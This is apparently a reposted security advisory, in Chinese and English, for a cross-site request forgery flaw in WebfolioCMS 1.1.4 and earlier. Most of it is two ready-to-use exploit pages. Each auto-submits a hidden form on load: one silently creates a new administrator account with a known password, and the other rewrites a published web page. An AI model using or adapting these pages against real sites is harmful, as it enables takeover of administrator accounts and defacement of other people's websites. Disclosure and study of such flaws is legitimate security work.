WebfolioCMS <= 1.1.4 CSRF (添加管理员/修改页面)及修

标题: WebfolioCMS <= 1.1.4 CSRF (Add Admin/Modify Pages) 作者: Ivano Binetti (http://ivanobinetti.com) 下载 地址: http://sourceforge.net/projects/webfolio-cms/files/WebfolioCMS-1.1.4.zip/download 开发这网站: http://webfolio-cms.sourceforge.net/ 影响版本: 1.1.4及更低 测试系统平台: Debian Squeeze (6.0)   +------------------------------------------[CSRF缺陷by Ivano Binetti]-----------------------------------------------+ Summary 1)介绍 2)缺陷描述 3)测试示例   3.1添加管理员   3.2 修改网页 +--------------------------------------------------------------------------------------------------------------------------------+ 1)程序介绍 Webfolio CMS "is a free, open-source, customized content management system, whose main purpose is creation of web sites for presenting someone's work, and portfolio-like websites". 2)缺陷描述 WebfolioCMS 1.1.4 (and lower) is affected by a CSRF Vulnerability which allows an attacker to add a new administrator, modify a web pages, and change may any other WebfolioCMS's parameter. In this document I will demonstrate how to add an administrator account and how to modify an existing and published web pages. other parameters can be modified with little changes. 3)测试  3.1 添加管理员  < html >  <body onload="javascript:document.forms[0].submit()">  <H2>CSRF Exploit to add ADMIN account</H2>  <form method="POST" name="form0" action="http:// www.2cto.com /admin/users/add ">  <input type="hidden" name="user[username]" value="new_admin"/>  <input type="hidden" name="user[email]" value="admin@admin.com"/>  <input type="hidden" name="user_meta[firstName]" value="admin_firstname"/>  <input type="hidden" name="user_meta[lastName]" value="admin_lastname"/>  <input type="hidden" name="user[password]" value="password"/>  <input type="hidden" name="re_password" value="password"/>  <input type="hidden" name="user[groupId]" value="1"/>  <input type="hidden" name="add" value="Add"/>  </form>  </body>  </html>   3.2 修改网页   <html>   <body onload="javascript:document.forms[0].submit()">   <H2>CSRF Exploit to Modify published web page</H2>   <form method="POST" name="form0" action="http:// www.2cto.com /admin/pages/edit/web_page_name">   <input type="hidden" name="title" value="new_title"/>   <input type="hidden" name="text" value="new_text"/>   <input type="hidden" name="id" value="1"/>   <input type="hidden" name="titleUrlFormat" value="test"/>   <input type="hidden" name="save" value="Save"/>   </form>   </body>   </html> +-------------

查看更多关于WebfolioCMS <= 1.1.4 CSRF (添加管理员/修改页面)及修的详细内容...